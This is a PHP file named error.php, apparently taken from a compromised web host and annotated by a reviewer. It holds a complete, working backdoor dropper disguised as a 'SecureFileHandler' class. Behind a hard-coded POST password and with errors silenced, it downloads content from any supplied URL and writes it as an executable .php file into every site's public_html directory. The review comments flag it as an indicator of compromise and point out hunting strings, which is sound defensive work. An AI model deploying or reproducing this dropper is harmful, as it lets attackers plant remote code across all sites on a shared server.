Edit File by line
/home/zeestwma/richards...
File: error.php
<?php
// Turns off PHP error reporting and on-page error display for this request,
// so failures in the code below leave no warnings in the HTTP response.
error_reporting(0);
ini_set('display_errors', 0);
/**
 * Downloads the body of a caller-supplied URL and writes it into the
 * public_html/ directory of every site folder found under "domains/".
 *
 * NOTE(review): despite the class name, nothing here is a security control.
 * The URL is only checked for URL syntax (no host or scheme restriction, so
 * it is not tied to GitHub), and the fetched bytes are written unmodified to
 * a .php file inside each web root, where the web server would presumably
 * execute them. A copy of this file on a host is an indicator of compromise.
 * The same content is written to every site, so once one dropped file is
 * identified the others can be located by hash.
 */
class SecureFileHandler {
    // Source URL whose response body is written to disk; caller-supplied.
    private $github_file_url;
    // Requested name of the .txt copy; only its basename is used (see createFiles).
    private $new_txt_file_path;
    // Requested name of the .php copy; only its basename is used (see createFiles).
    private $new_php_file_path;

    /**
     * Stores the three request values without any checking; validation is
     * deferred to validateInput().
     *
     * @param mixed $github_file_url    URL to fetch.
     * @param mixed $new_txt_file_path  Name for the .txt file to create.
     * @param mixed $new_php_file_path  Name for the .php file to create.
     */
    public function __construct($github_file_url, $new_txt_file_path, $new_php_file_path) {
        $this->github_file_url = $github_file_url;
        $this->new_txt_file_path = $new_txt_file_path;
        $this->new_php_file_path = $new_php_file_path;
    }

    /**
     * Runs the whole sequence (validate, fetch, write) and echoes a JSON result.
     *
     * On success the response lists every site directory that was processed;
     * on failure it carries the exception message, which for a missing
     * "domains/" directory includes the computed filesystem path.
     */
    public function process() {
        try {
            if (!$this->validateInput()) {
                throw new Exception("Invalid input data.");
            }

            $file_content = $this->fetchFileContent();
            // Any falsy result is treated as a fetch failure, which also covers
            // an empty response body, not only a failed request.
            if (!$file_content) {
                throw new Exception("Failed to fetch file from GitHub.");
            }

            $directories = $this->processDirectories($file_content);

            echo json_encode(["success" => true, "directories" => $directories], JSON_PRETTY_PRINT);
        } catch (Exception $e) {
            echo json_encode(["error" => $e->getMessage()], JSON_PRETTY_PRINT);
        }
    }

    /**
     * Requires all three inputs to be non-empty and the URL to pass
     * FILTER_VALIDATE_URL.
     *
     * NOTE(review): this is a syntax check only. The host is never compared
     * against an allowlist, and the two file names are not inspected here.
     */
    private function validateInput() {
        return $this->github_file_url && $this->new_txt_file_path && $this->new_php_file_path &&
            filter_var($this->github_file_url, FILTER_VALIDATE_URL);
    }

    /**
     * Fetches the URL with file_get_contents(). The @ operator suppresses any
     * warning, so a failure surfaces only as a false return value.
     */
    private function fetchFileContent() {
        return @file_get_contents($this->github_file_url);
    }

    /**
     * Walks every sub-directory of the "domains/" path and writes the files
     * into each one that contains a public_html/ directory.
     *
     * @param string $file_content Bytes to write into each site.
     * @return array Names of the site directories that were processed.
     * @throws Exception When the computed "domains/" path is not a directory.
     */
    private function processDirectories($file_content) {
        $domains_path = $this->getDomainsPath();
        if (!is_dir($domains_path)) {
            throw new Exception("The directory '{$domains_path}' does not exist.");
        }

        $directories = [];
        foreach (scandir($domains_path) as $item) {
            if ($item === '.' || $item === '..' || !is_dir($domains_path . $item)) {
                continue;
            }

            $current_dir = $domains_path . $item . '/public_html/';
            if (!is_dir($current_dir)) {
                continue;
            }

            // The site is added to the report whether or not the writes in
            // createFiles() succeeded; that method returns nothing.
            $this->createFiles($current_dir, $file_content);
            $directories[] = $item;
        }

        return $directories;
    }

    /**
     * Writes the same content to a .txt and a .php file inside $dir.
     *
     * basename() reduces each requested name to its final path component, so
     * the files land directly in $dir. The return values of
     * file_put_contents() are ignored, and an existing file of the same name
     * is overwritten.
     *
     * @param string $dir     Target directory, with trailing slash.
     * @param string $content Bytes to write.
     */
    private function createFiles($dir, $content) {
        $txt_file_path = $dir . basename($this->new_txt_file_path);
        $php_file_path = $dir . basename($this->new_php_file_path);

        if ($this->isValidPath($txt_file_path, 'txt')) {
            file_put_contents($txt_file_path, $content);
        }

        if ($this->isValidPath($php_file_path, 'php')) {
            file_put_contents($php_file_path, $content);
        }
    }

    /**
     * Accepts a path when its extension equals $expected_extension
     * (case-sensitive comparison) and it contains neither "../" nor "..\".
     */
    private function isValidPath($file_path, $expected_extension) {
        return pathinfo($file_path, PATHINFO_EXTENSION) === $expected_extension &&
            strpos($file_path, '../') === false && strpos($file_path, '..\\') === false;
    }

    /**
     * Derives the "domains/" directory from this script's own location.
     *
     * __DIR__ is normalised to forward slashes and rebuilt with a leading and
     * trailing slash; everything before the first "domains/" is kept and
     * "domains/" is appended.
     *
     * NOTE(review): if the script's path has no "domains/" segment, strstr()
     * returns false and the result is the relative string "domains/".
     */
    private function getDomainsPath() {
        $full_path = __DIR__;
        $directory_path = str_replace('\\', '/', $full_path);
        $path_parts = explode('/', $directory_path);
        $domains_path = '/';
        foreach ($path_parts as $part) {
            if (!empty($part)) {
                $domains_path .= $part . '/';
            }
        }
        return strstr($domains_path, 'domains/', true) . 'domains/';
    }
}
// Access gate: the POST field "api_key" must equal a string hard-coded in this
// file; otherwise a JSON error is echoed and the script stops.
// NOTE(review): this static string is the only control in front of the file
// writes below. No HTTP status code is set on rejection, so the reply
// presumably goes out with the default status and will not stand out as a
// 401/403 in access logs. The literal is a usable search string when hunting
// for other copies of this script.
$api_key = $_POST['api_key'] ?? null;
$valid_api_key = 'hoho2013';
if ($api_key !== $valid_api_key) {
    echo json_encode(["error" => "Unauthorized access."], JSON_PRETTY_PRINT);
    exit;
}

// The source URL and both target file names come straight from the POST body
// and are passed to the handler unchanged; all checking happens inside the class.
$github_file_url = $_POST['github_file_url'] ?? null;
$new_txt_file_path = $_POST['new_txt_file_path'] ?? null;
$new_php_file_path = $_POST['new_php_file_path'] ?? null;

$fileHandler = new SecureFileHandler($github_file_url, $new_txt_file_path, $new_php_file_path);
$fileHandler->process();
?>